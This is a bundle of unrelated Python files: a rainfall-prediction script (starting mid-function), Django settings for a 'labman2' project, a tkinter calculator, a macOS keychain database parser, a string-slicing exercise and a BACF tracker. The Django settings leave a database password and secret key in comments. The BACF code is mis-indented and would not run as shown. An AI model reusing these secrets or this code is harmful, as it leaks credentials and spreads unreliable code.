    for j, x in enumerate(X.T):
        q = scipy.stats.mstats.mquantiles(x[x>0.1], np.arange(0,n-1)/float(n-2))
        breaks = np.concatenate(([-1, 0], q))
        model = models[j]
        for i in range(0, n):
            # Add this bucket's CDF to every sample whose value lies in it.
            predictions[(x>breaks[i])&(x<=breaks[i+1]),0:m]+=model[i]/float(len(X.T))
    return predictions
def classification_features(cX, predictions):
    """Concatenate each row's raw features with its predicted CDF."""
    return np.array([list(cX[i]) + list(predictions[i]) for i in range(len(cX))])
# --- Train on 2013 data, score it, then write the 2014 submission. ---------
# FIXES: Python-2-only print statements and `xrange`; `id` shadowed the
# builtin; the submission file handle was never closed; message typos.
_, X, y, cX = data_set('train_2013.csv')
model = fit_cdf(X, y)
predictions = predict_cdf(X, model)
print('CRPS', calc_crps(predictions, y))
# Disabled experiment: rescale confident "no rain" predictions with a classifier.
'''
cX = classification_features(cX, predictions)
from sklearn import linear_model
clf = linear_model.LogisticRegression(tol=1e-8, C=128)
y_labels = as_labels(y)
clf.fit(cX, y_labels)
print('Training Accuracy', clf.score(cX, y_labels))
from sklearn.metrics import classification_report
print(classification_report(y_labels, clf.predict(cX)))
X_l = clf.predict_proba(cX)
for i, l in enumerate(X_l):
    if predictions[i][0] > 0.95:
        predictions[i] = (predictions[i] + 1) / 2
print('CRPS: ', calc_crps(predictions, y))
'''
print('Predicting for submission...')
print('Loading test file...')
ids, X, y, cX = data_set('test_2014.csv')
predictions = predict_cdf(X, model)
'''
cX = classification_features(cX, predictions)
X_l = clf.predict_proba(cX)
for i, l in enumerate(X_l):
    if l[0] > 0.5:
        predictions[i] = (predictions[i] + 1) / 2
'''
cdfs = predictions
print('Writing submission file...')
with open('classifier-cdfavg-sub.csv', 'w') as submission_file:
    writer = csv.writer(submission_file)
    solution_header = ['Id']
    solution_header.extend(['Predicted{0}'.format(t) for t in range(0, 70)])
    writer.writerow(solution_header)
    for i, row_id in enumerate(ids):
        solution_row = [row_id]
        solution_row.extend(cdfs[i])
        writer.writerow(solution_row)
        if i % 10000 == 0:
            print("Completed row %d" % i)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'Django settings for labman2 project.'
# Development defaults; DEBUG must be False in production deployments.
DEBUG = True
TEMPLATE_DEBUG = DEBUG
#ALLOWED_HOSTS = ['127.0.0.1', 'localhost',]
import os
from os.path import join, abspath, dirname, sep
# Absolute path of the directory containing this settings module.
PROJECT_ROOT = abspath(join(dirname(__file__), "."))
def root(*parts):
    "Absolute path to a subdir of the project"
    # Resolve relative to the settings module's directory.
    return abspath(join(PROJECT_ROOT, *parts))
def get_env(var_name):
    "Read an ENV variable, e.g. password"
    value = os.environ.get(var_name)
    if value is None:
        # Fail loudly: a missing secret must abort settings loading.
        print("Environment variable '%s' is not set, cannot continue." %
              var_name)
        raise KeyError(var_name)
    return value
ADMINS = [
    # ('Your Name', 'your_email@example.com'),
]
# BUG FIX: the original did `ADMINS += (name, email)`, which extended the
# list with the two strings separately; Django requires ADMINS to be a
# sequence of (name, email) pairs, so append one tuple instead.
ADMINS += [(get_env("LABMAN2_ADMIN_NAME"), get_env("LABMAN2_ADMIN_EMAIL"))]
MANAGERS = ADMINS
# Database connection; the password is injected from the environment below
# so no secret is committed to version control.
DATABASES = {
    'default': {
        #Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
        'ENGINE': 'django.db.backends.postgresql_psycopg2',
        'NAME': 'labman2', # Or path to database file if using sqlite3.
        'USER': 'www', # Not used with sqlite3.
        # 'PASSWORD': 'Y5t2KUII', # Not used with sqlite3.
        'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
        'PORT': '', # Set to empty string for default. Not used with sqlite3.
        #'OPTIONS': {'autocommit': True}, # Needed for tests with psycopg2 v.2.4.2
    }
}
DATABASES['default']['PASSWORD'] = get_env("LABMAN2_DB_PASSWD")
#New in Django 1.6.
#Default:False,
#ATOMIC_REQUESTS = True # wrap each HTTP request in a transaction
# on this database
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
#TIME_ZONE = 'America/Chicago'
#TIME_ZONE = None
TIME_ZONE = 'Europe/Helsinki'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
# Languages offered by the UI language switcher.
LANGUAGES = (
    ('en', (u'English')),
    ('fi', (u'Suomi')),
    ('ru', (u'Русский')),
    # ('sv', (u'Svenska')),
)
#SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
#django 1.4
# If you set this to False, Django will not use timezone-aware datetimes.
#USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = root('uploads')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = '/uploads/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
#for Svetlana
#STATIC_ROOT = 'C:/Users/Svetlana/labman2/labman2/static/'
#for Vova
STATIC_ROOT = root('static')
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
#STATIC_DOC_ROOT = '/home/chu/progs/labman2/labman2/static'
# Kept as an alias of STATIC_ROOT for views that still reference it.
STATIC_DOC_ROOT = STATIC_ROOT
LOGIN_URL = '/accounts/login/'
#The URL where requests are redirected after login
LOGIN_REDIRECT_URL = '/'
# Additional locations of static files
STATICFILES_DIRS = (
    # Put strings here, like "/home/html/static" or "C:/www/django/static".
    # Always use forward slashes, even on Windows.
    # Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
    'django.contrib.staticfiles.finders.FileSystemFinder',
    'django.contrib.staticfiles.finders.AppDirectoriesFinder',
    # 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
#SECRET_KEY = 'qgpjbmj(vup)e5s4oy*-f(84o-04ck%pxvbpi3hj^w%%41%d@-'
# The secret key comes from the environment so it is never committed.
SECRET_KEY = get_env("LABMAN2_SECRET_KEY")
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
    'django.template.loaders.filesystem.Loader',
    'django.template.loaders.app_directories.Loader',
    # 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.locale.LocaleMiddleware',
    'django.middleware.common.CommonMiddleware',
    #'django.middleware.transaction.TransactionMiddleware', is deprecated
    #and replaced by ATOMIC_REQUESTS
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'labman2.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'labman2.wsgi.application'
TEMPLATE_DIRS = (
    # Put strings here, like "/home/html/django_templates" or
    # "C:/www/django/templates".
    # Always use forward slashes, even on Windows.
    # Don't forget to use absolute paths, not relative paths.
)
# Discover sub-application directories under labman2/data/subdata at import
# time; 'sql' and the root 'subdata' directory itself are not apps.
SUBDIRS = [name[0].split(sep)[-1]
           for name in os.walk(abspath(join("labman2", "data", "subdata")))
           if name[0].split(sep)[-1] not in ('sql', 'subdata')]
# django-registration from
# http://www.bitbucket.org/ubernostrum/django-registration/
INSTALLED_APPS = [
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    # 'django.contrib.sites',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'django.contrib.admin',
    'django.contrib.admindocs',
    # 'registration',
    'labman2',
    'labman2.data',
    'labman2.data.subdata',
    'allauth',
]
# Register every discovered subdata directory as its own app.
INSTALLED_APPS.extend(['labman2.data.subdata.%s' % name for name in SUBDIRS])
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
    'version': 1,
    'disable_existing_loggers': False,
    'filters': {
        # Limits mail_admins to production (DEBUG = False) only.
        'require_debug_false': {
            '()': 'django.utils.log.RequireDebugFalse'
        }
    },
    'handlers': {
        'mail_admins': {
            'level': 'ERROR',
            'filters': ['require_debug_false'],
            'class': 'django.utils.log.AdminEmailHandler'
        },
        'console': {
            # logging handler that outputs log messages to terminal
            'class': 'logging.StreamHandler',
            'level': 'DEBUG', # message level to be written to console
        },
    },
    'loggers': {
        # Root logger: everything goes to the console; errors are mailed.
        '': {
            'handlers': ['mail_admins', 'console'],
            'level': 'DEBUG',
            'propagate': True,
        },
        'django.request': {
            'handlers': ['mail_admins'],
            'level': 'ERROR',
            'propagate': True,
        },
    }
}
# Tests for registration need the following.
ACCOUNT_ACTIVATION_DAYS = 3
|
#CALCULATOR BY:GJAYZ
import sys
from tkinter import *
from tkinter import messagebox
# Main application window.
Calculator = Tk()
Calculator.geometry()
Calculator.title("Calculator By:Gjayz")
Calculator.configure()
# Shared state: text_Input backs the display, operator accumulates the
# expression typed via the buttons.
text_Input = StringVar()
operator = ""
# Frame holding the display entry and the button grid.
Calculator_Function = Frame(Calculator, bg="plum4", bd=6, relief=GROOVE)
Calculator_Function.pack(side=BOTTOM)
def btnClick(NumbersCal):
    """Append the pressed key (digit or operator symbol) to the expression."""
    global operator
    operator += str(NumbersCal)
    text_Input.set(operator)
def btnClear():
    """Reset the pending expression and show 0 on the display."""
    global operator
    operator = ""
    text_Input.set("0")
def btnEquals():
    """Evaluate the pending expression and show the result on the display.

    FIX: eval of a malformed expression (e.g. "5+") or division by zero
    previously raised inside the Tk callback and left the state stuck; show
    "Error" and reset instead.
    NOTE: eval is tolerable here only because the input comes solely from
    this calculator's own buttons, never from an untrusted source.
    """
    global operator
    try:
        sumup = str(eval(operator))
    except (SyntaxError, ZeroDivisionError, NameError, TypeError):
        sumup = "Error"
    text_Input.set(sumup)
    operator = ""
def Exit():
    """Ask for confirmation, then terminate the application."""
    if messagebox.askyesno("ARE U SURE", "Do you what to exit the system"):
        sys.exit()
#ENTRY
# Read-only-by-convention display wired to text_Input.
txtDisplay = Entry(Calculator_Function, width=25, bg="white", bd=4, font=("arial",20,"bold"), justify=RIGHT, textvariable=text_Input)
txtDisplay.grid(row=0,column=0,columnspan=4,pady=1)
txtDisplay.insert(0,"0")
#CALCULATOR BUTTONS
# Row 2: 7 8 9 +
b7=Button(Calculator_Function, padx=16, pady=1, bd=7, fg="snow", font=('arial', 12, 'bold'), width=3, text="7",bg="gray25",command=lambda:btnClick(7))
b7.grid(row=2,column=0)
b8=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="8",bg="gray25",command=lambda:btnClick(8))
b8.grid(row=2,column=1)
b9=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="9",bg="gray25",command=lambda:btnClick(9))
b9.grid(row=2,column=2)
bAdd=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="+",bg="gray25",command=lambda:btnClick('+'))
bAdd.grid(row=2,column=3)
#CALCULATOR BUTTONS
# Row 3: 4 5 6 -
b4=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="4",bg="gray25",command=lambda:btnClick(4))
b4.grid(row=3,column=0)
b5=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="5",bg="gray25",command=lambda:btnClick(5))
b5.grid(row=3,column=1)
b6=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="6",bg="gray25",command=lambda:btnClick(6))
b6.grid(row=3,column=2)
bSub=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="-",bg="gray25",command=lambda:btnClick('-'))
bSub.grid(row=3,column=3)
#CALCULATOR BUTTONS
# Row 4: 1 2 3 x
b1=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="1",bg="gray25",command=lambda:btnClick(1))
b1.grid(row=4,column=0)
b2=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="2",bg="gray25",command=lambda:btnClick(2))
b2.grid(row=4,column=1)
b3=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="3",bg="gray25",command=lambda:btnClick(3))
b3.grid(row=4,column=2)
bMulti=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="x",bg="gray25",command=lambda:btnClick('*'))
bMulti.grid(row=4,column=3)
#CALCULATOR BUTTONS
# Row 5: 0 C = /
b0=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="0",bg="gray25",command=lambda:btnClick(0))
b0.grid(row=5,column=0)
bClear=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="C",bg="gray25",command=btnClear)
bClear.grid(row=5,column=1)
bEqual=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="=",bg="gray25",command=btnEquals)
bEqual.grid(row=5,column=2)
bDiv=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="/",bg="gray25",command=lambda:btnClick("/"))
bDiv.grid(row=5,column=3)
#CALCULATOR BUTTONS
# Row 6: % power floor-division Exit
bModulus=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="%",bg="gray25",command=lambda:btnClick('%'))
bModulus.grid(row=6,column=0)
bExpon=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="xx",bg="gray25",command=lambda:btnClick('**'))
bExpon.grid(row=6,column=1)
bFdivision=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="//",bg="gray25",command=lambda:btnClick('//'))
bFdivision.grid(row=6,column=2)
bExit=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="Exit",bg="gray25",command=Exit)
bExit.grid(row=6,column=3)
#LOOPS
Calculator.mainloop()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Script to parse MacOS keychain database files."""
import argparse
import logging
import sys
from dtformats import keychain
from dtformats import output_writers
# Maps CSSM_DB_ATTRIBUTE_FORMAT values to human-readable type names;
# formats without a friendly description keep their CSSM constant name.
ATTRIBUTE_DATA_TYPES = {
    0: 'String with size',
    1: 'Integer 32-bit signed',
    2: 'Integer 32-bit unsigned',
    3: 'CSSM_DB_ATTRIBUTE_FORMAT_BIG_NUM',
    4: 'Floating-point 64-bit',
    5: 'Date and time',
    6: 'Binary data',
    7: 'CSSM_DB_ATTRIBUTE_FORMAT_MULTI_UINT32',
    8: 'CSSM_DB_ATTRIBUTE_FORMAT_COMPLEX'}
def Main():
  """The main program function.

  Parses the command line, opens the keychain database and prints either
  its schema or its content.

  FIXES: the monolithic body is split into schema/content helpers, and the
  keychain file and output writer are now closed in a ``finally`` block so
  they are released even when printing fails.

  Returns:
    bool: True if successful or False if not.
  """
  argument_parser = argparse.ArgumentParser(description=(
      'Extracts information from MacOS keychain database files.'))

  argument_parser.add_argument(
      '-c', '--content', dest='content', action='store_true', default=False,
      help='export database content instead of schema.')
  argument_parser.add_argument(
      '-d', '--debug', dest='debug', action='store_true', default=False,
      help='enable debug output.')
  argument_parser.add_argument(
      'source', nargs='?', action='store', metavar='PATH',
      default=None, help='path of the keychain database file.')

  options = argument_parser.parse_args()

  if not options.source:
    print('Source file missing.')
    print('')
    argument_parser.print_help()
    print('')
    return False

  logging.basicConfig(
      level=logging.INFO, format='[%(levelname)s] %(message)s')

  output_writer = output_writers.StdoutWriter()
  try:
    output_writer.Open()
  except IOError as exception:
    print(f'Unable to open output writer with error: {exception!s}')
    print('')
    return False

  keychain_file = keychain.KeychainDatabaseFile(
      debug=options.debug, output_writer=output_writer)
  keychain_file.Open(options.source)
  try:
    if not options.content:
      _PrintSchema(keychain_file)
    else:
      _PrintContent(keychain_file)
  finally:
    # Release the file and the writer even if printing raised.
    keychain_file.Close()
    output_writer.Close()

  return True


def _PrintSchema(keychain_file):
  """Prints each table's columns and attribute types (schema view)."""
  print('Keychain database file schema:')
  for table in keychain_file.tables:
    print((f'Table: {table.relation_name:s} '
           f'(0x{table.relation_identifier:08x})'))
    number_of_columns = len(table.columns)
    print(f'\tNumber of columns:\t{number_of_columns:d}')
    print('\tColumn\tIdentifier\tName\tType')
    for index, column in enumerate(table.columns):
      # Identifiers at or beyond the column count are not real column
      # indices; show them as blank.
      if column.attribute_identifier >= number_of_columns:
        attribute_identifier = ''
      else:
        attribute_identifier = f'{column.attribute_identifier:d}'
      attribute_data_type = ATTRIBUTE_DATA_TYPES.get(
          column.attribute_data_type,
          f'0x{column.attribute_data_type:08x}')
      attribute_name = column.attribute_name or 'NULL'
      print((f'\t{index:d}\t{attribute_identifier:s}\t{attribute_name:s}\t'
             f'{attribute_data_type:s}'))
    print('')
  print('')


def _PrintContent(keychain_file):
  """Prints each table's records as tab-separated rows (content view)."""
  for table in keychain_file.tables:
    print((f'Table: {table.relation_name:s} '
           f'(0x{table.relation_identifier:08x})'))
    print('\t'.join([column.attribute_name for column in table.columns]))
    for record in table.records:
      record_values = []
      for value in record.values():
        if value is None:
          record_values.append('NULL')
        else:
          record_values.append(f'{value!s}')
      print('\t'.join(record_values))
    print('')
if __name__ == '__main__':
  # Exit status 0 on success, 1 on failure.
  sys.exit(0 if Main() else 1)
|
# # here we are going to define a list # #
# name = str(input("Enter your name : "))
#
# for i in range(len(name)):
#     print("Your name {}. letter: {}".format(i, name[i]))

website1 = "www.google.com"
website2 = "www.istihza.com"
website3 = "www.facebook.com"
website4 = "www.guru99.com"

# Strip the leading "www." and trailing ".com" (4 characters at each end).
for names in (website1, website2, website3, website4):
    print("site: ", names[4:-4])
    print("----------------------------------")
|
"""
Python re-implementation of "Learning Background-Aware Correlation Filters for Visual Tracking"
@article{Galoogahi2017Learning,
title={Learning Background-Aware Correlation Filters for Visual Tracking},
author={Galoogahi, Hamed Kiani and Fagg, Ashton and Lucey, Simon},
year={2017},
}
"""
import numpy as np
import cv2
from .base import BaseCF
from lib.utils import cos_window,gaussian2d_rolled_labels
from lib.fft_tools import fft2,ifft2
from .feature import extract_hog_feature
from .config.bacf_config import BACFConfig
class BACF(BaseCF):
def __init__(self, config=BACFConfig()):
super(BACF).__init__()
self.cell_size=config.cell_size
self.cell_selection_thresh=config.cell_selection_thresh
self.search_area_shape = config.search_area_shape
self.search_area_scale=config.search_area_scale
self.filter_max_area = config.filter_max_area
self.interp_factor=config.interp_factor
self.output_sigma_factor = config.output_sigma_factor
self.interpolate_response =config.interpolate_response
self.newton_iterations =config.newton_iterations
self.number_of_scales =config.number_of_scales
self.scale_step = config.scale_step
self.admm_iterations = config.admm_iterations
self.admm_lambda = config.admm_lambda
    def init(self,first_frame,bbox):
        """Initialize the tracker on the first frame.

        first_frame: initial image; bbox: (x, y, w, h) of the target.
        Sets up the search area, Gaussian label FFT, cosine window, scale
        pyramid, extracts the first HOG feature map and solves for the
        initial filter via ADMM.
        """
        bbox = np.array(bbox).astype(np.int64)
        x, y, w, h = tuple(bbox)
        self._center = (x + w / 2, y + h / 2)
        self.w, self.h = w, h
        self.feature_ratio=self.cell_size
        # Search area measured in feature-map cells.
        self.search_area=(self.w/self.feature_ratio*self.search_area_scale)*\
                         (self.h/self.feature_ratio*self.search_area_scale)
        # Very small search areas: shrink the cell size so the feature map
        # keeps enough resolution.
        if self.search_area<self.cell_selection_thresh*self.filter_max_area:
            self.cell_size=int(min(self.feature_ratio,max(1,int(np.ceil(np.sqrt(
                self.w*self.search_area_scale/(self.cell_selection_thresh*self.filter_max_area)*\
                self.h*self.search_area_scale/(self.cell_selection_thresh*self.filter_max_area)
            ))))))
            self.feature_ratio=self.cell_size
            self.search_area = (self.w / self.feature_ratio * self.search_area_scale) * \
                               (self.h / self.feature_ratio * self.search_area_scale)
        # Oversized search areas are handled by scaling the target down.
        if self.search_area>self.filter_max_area:
            self.current_scale_factor=np.sqrt(self.search_area/self.filter_max_area)
        else:
            self.current_scale_factor=1.
        self.base_target_sz=(self.w/self.current_scale_factor,self.h/self.current_scale_factor)
        self.target_sz=self.base_target_sz
        # Crop window geometry around the target.
        if self.search_area_shape=='proportional':
            self.crop_size=(int(self.base_target_sz[0]*self.search_area_scale),int(self.base_target_sz[1]*self.search_area_scale))
        elif self.search_area_shape=='square':
            w=int(np.sqrt(self.base_target_sz[0]*self.base_target_sz[1])*self.search_area_scale)
            self.crop_size=(w,w)
        elif self.search_area_shape=='fix_padding':
            tmp=int(np.sqrt(self.base_target_sz[0]*self.search_area_scale+(self.base_target_sz[1]-self.base_target_sz[0])/4))+\
                (self.base_target_sz[0]+self.base_target_sz[1])/2
            self.crop_size=(self.base_target_sz[0]+tmp,self.base_target_sz[1]+tmp)
        else:
            raise ValueError
        # Round the crop to a whole number of feature cells.
        self.crop_size=(int(round(self.crop_size[0]/self.feature_ratio)*self.feature_ratio),int(round(self.crop_size[1]/self.feature_ratio)*self.feature_ratio))
        self.feature_map_sz=(self.crop_size[0]//self.feature_ratio,self.crop_size[1]//self.feature_ratio)
        # Desired correlation output: a rolled 2D Gaussian, in the Fourier domain.
        output_sigma=np.sqrt(np.floor(self.base_target_sz[0]/self.feature_ratio)*np.floor(self.base_target_sz[1]/self.feature_ratio))*self.output_sigma_factor
        y=gaussian2d_rolled_labels(self.feature_map_sz, output_sigma)
        self.yf=fft2(y)
        if self.interpolate_response==1:
            self.interp_sz=(self.feature_map_sz[0]*self.feature_ratio,self.feature_map_sz[1]*self.feature_ratio)
        else:
            self.interp_sz=(self.feature_map_sz[0],self.feature_map_sz[1])
        self._window=cos_window(self.feature_map_sz)
        # Scale pyramid and its legal range.
        if self.number_of_scales>0:
            scale_exp=np.arange(-int(np.floor((self.number_of_scales-1)/2)),int(np.ceil((self.number_of_scales-1)/2))+1)
            self.scale_factors=self.scale_step**scale_exp
            self.min_scale_factor=self.scale_step**(np.ceil(np.log(max(5/self.crop_size[0],5/self.crop_size[1]))/np.log(self.scale_step)))
            self.max_scale_factor=self.scale_step**(np.floor(np.log(min(first_frame.shape[0]/self.base_target_sz[1],
                                                                        first_frame.shape[1]/self.base_target_sz[0]))/np.log(self.scale_step)))
        # Frequency grids used by the Newton-iteration sub-pixel localizer.
        if self.interpolate_response>=3:
            self.ky=np.roll(np.arange(-int(np.floor((self.feature_map_sz[1]-1)/2)),int(np.ceil((self.feature_map_sz[1]-1)/2+1))),
                            -int(np.floor((self.feature_map_sz[1]-1)/2)))
            self.kx=np.roll(np.arange(-int(np.floor((self.feature_map_sz[0]-1)/2)),int(np.ceil((self.feature_map_sz[0]-1)/2+1))),
                            -int(np.floor((self.feature_map_sz[0]-1)/2))).T
        self.small_filter_sz=(int(np.floor(self.base_target_sz[0]/self.feature_ratio)),int(np.floor(self.base_target_sz[1]/self.feature_ratio)))
        # First feature extraction and initial ADMM filter solve.
        pixels=self.get_sub_window(first_frame,self._center,model_sz=self.crop_size,
                                   scaled_sz=(int(np.round(self.crop_size[0]*self.current_scale_factor)),
                                              int(np.round(self.crop_size[1]*self.current_scale_factor))))
        feature=extract_hog_feature(pixels, cell_size=self.feature_ratio)
        self.model_xf=fft2(self._window[:,:,None]*feature)
        self.g_f=self.ADMM(self.model_xf)
def update(self,current_frame,vis=False):
    """Run one tracking step on a new frame.

    Extracts multi-scale HOG features, localizes the target from the
    correlation response, updates scale/translation state, blends the new
    features into the model (rate interp_factor) and re-solves the filter
    with ADMM.

    :param current_frame: new video frame (image array)
    :param vis: if True, stores the (centered) response map in self.score
    :return: [x, y, w, h] bounding box in image coordinates
    """
    x=None
    # Stack per-scale feature maps along a new 4th axis.
    for scale_ind in range(self.number_of_scales):
        current_scale=self.current_scale_factor*self.scale_factors[scale_ind]
        sub_window=self.get_sub_window(current_frame,self._center,model_sz=self.crop_size,
                                       scaled_sz=(int(round(self.crop_size[0]*current_scale)),
                                                  int(round(self.crop_size[1]*current_scale))))
        feature= extract_hog_feature(sub_window, self.cell_size)[:, :, :, np.newaxis]
        if x is None:
            x=feature
        else:
            x=np.concatenate((x,feature),axis=3)
    xtf=fft2(x*self._window[:,:,None,None])
    # Correlation response in the Fourier domain, summed over feature channels.
    responsef=np.sum(np.conj(self.g_f)[:,:,:,None]*xtf,axis=2)
    if self.interpolate_response==2:
        # Interpolation grid follows the current target scale.
        self.interp_sz=(int(self.yf.shape[1]*self.feature_ratio*self.current_scale_factor),
                        int(self.yf.shape[0]*self.feature_ratio*self.current_scale_factor))
    responsef_padded=self.resize_dft2(responsef,self.interp_sz)
    response=np.real(ifft2(responsef_padded))
    if self.interpolate_response==3:
        # Mode 3 is not implemented.
        raise ValueError
    elif self.interpolate_response==4:
        # Sub-cell localization via Newton's method on the DFT.
        disp_row,disp_col,sind=self.resp_newton(response,responsef_padded,self.newton_iterations,
                                                self.ky,self.kx,self.feature_map_sz)
        if vis is True:
            self.score=response[:,:,sind]
            self.score = np.roll(self.score, int(np.floor(self.score.shape[0] / 2)), axis=0)
            self.score = np.roll(self.score, int(np.floor(self.score.shape[1] / 2)), axis=1)
    else:
        # Integer localization at the response argmax.
        row,col,sind=np.unravel_index(np.argmax(response,axis=None),response.shape)
        if vis is True:
            self.score=response[:,:,sind]
            self.score = np.roll(self.score, int(np.floor(self.score.shape[0] / 2)), axis=0)
            self.score = np.roll(self.score, int(np.floor(self.score.shape[1] / 2)), axis=1)
        # Wrap argmax indices into signed displacements around the origin.
        disp_row=(row-1+int(np.floor(self.interp_sz[1]-1)/2))%self.interp_sz[1]-int(np.floor((self.interp_sz[1]-1)/2))
        disp_col = (col-1 + int(np.floor(self.interp_sz[0] - 1) / 2)) % self.interp_sz[0] - int(
            np.floor((self.interp_sz[0] - 1) / 2))
    # Convert response-cell displacement back to image pixels.
    if self.interpolate_response==0 or self.interpolate_response==3 or self.interpolate_response==4:
        factor=self.feature_ratio*self.current_scale_factor*self.scale_factors[sind]
    elif self.interpolate_response==1:
        factor=self.current_scale_factor*self.scale_factors[sind]
    elif self.interpolate_response==2:
        factor=self.scale_factors[sind]
    else:
        raise ValueError
    dx,dy=int(np.round(disp_col*factor)),int(np.round(disp_row*factor))
    # Update and clamp scale, then move the target center.
    self.current_scale_factor=self.current_scale_factor*self.scale_factors[sind]
    self.current_scale_factor=max(self.current_scale_factor,self.min_scale_factor)
    self.current_scale_factor=min(self.current_scale_factor,self.max_scale_factor)
    self._center=(self._center[0]+dx,self._center[1]+dy)
    # Model update at the new state, then re-solve the filter.
    pixels=self.get_sub_window(current_frame,self._center,model_sz=self.crop_size,
                               scaled_sz=(int(round(self.crop_size[0]*self.current_scale_factor)),
                                          int(round(self.crop_size[1]*self.current_scale_factor))))
    feature=extract_hog_feature(pixels, cell_size=self.cell_size)
    #feature=cv2.resize(pixels,self.feature_map_sz)/255-0.5
    xf=fft2(feature*self._window[:,:,None])
    self.model_xf=(1-self.interp_factor)*self.model_xf+self.interp_factor*xf
    self.g_f = self.ADMM(self.model_xf)
    target_sz=(self.target_sz[0]*self.current_scale_factor,self.target_sz[1]*self.current_scale_factor)
    return [self._center[0]-target_sz[0]/2,self._center[1]-target_sz[1]/2,target_sz[0],target_sz[1]]
def get_subwindow_no_window(self, img, pos, sz):
    """Crop a sz[0] x sz[1] patch centred at pos, clamping indices to the
    image bounds (border pixels are repeated instead of padded).

    :param img: source array (H x W[, C])
    :param pos: (x, y) patch centre
    :param sz: (w, h) patch size
    :return: (grid_x, grid_y, patch) where the grids come from np.meshgrid
    """
    width, height = sz[0], sz[1]
    col_idx = (np.floor(pos[0]) + np.arange(width) - np.floor(width / 2)).astype(np.int64)
    row_idx = (np.floor(pos[1]) + np.arange(height) - np.floor(height / 2)).astype(np.int64)
    # Clamp out-of-range indices to the first/last valid row and column.
    np.clip(col_idx, 0, img.shape[1] - 1, out=col_idx)
    np.clip(row_idx, 0, img.shape[0] - 1, out=row_idx)
    patch = img[row_idx, :][:, col_idx]
    grid_x, grid_y = np.meshgrid(col_idx, row_idx)
    return grid_x, grid_y, patch
def ADMM(self,xf):
    """Solve for the correlation filter g_f with ADMM (BACF-style).

    Alternates a closed-form Fourier-domain solve for g, a spatial-domain
    update for h cropped to small_filter_sz (the background-aware
    constraint), and a dual-variable update, growing the penalty mu by
    `beta` per iteration up to `mumax`.

    :param xf: FFT of windowed training features, (H x W x C) complex
    :return: filter g_f in the Fourier domain, same shape as xf
    """
    g_f = np.zeros_like(xf)
    h_f = np.zeros_like(g_f)
    l_f = np.zeros_like(g_f)  # Lagrange multiplier (dual variable)
    mu = 1         # ADMM penalty parameter
    beta = 10      # growth factor for mu
    mumax = 10000  # cap for mu
    i = 1
    T = self.feature_map_sz[0] * self.feature_map_sz[1]
